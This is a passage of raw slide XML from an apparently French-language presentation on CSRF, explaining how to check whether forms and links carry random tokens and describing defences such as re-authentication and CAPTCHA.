              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forgée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cette</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dernière</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aboutira</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4067944"/>
            <a:ext cx="3429000" cy="2664296"/>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en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vérifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chaque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lien et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formulaire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jeton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aléatoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Sans de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jetons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forger des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requêtes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicieuses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>défense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alternative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consiste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s’assurer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’auteur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ré-authentification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demande</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n’est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatisée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (ex., par un test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concentrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sur les liens et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formulaires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>appellent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des fonctions de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’état car </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>principales</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vérifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les transactions qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plusieurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>étapes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> car </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intrinsèquement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sans faille. Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaquants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peuvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facilement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forger des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>séries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requêtes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilisant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>balises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> multiples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>éventuellement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  Attention, les cookies de session, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IP source, et </a:t>
            </a:r>
            <a:r>
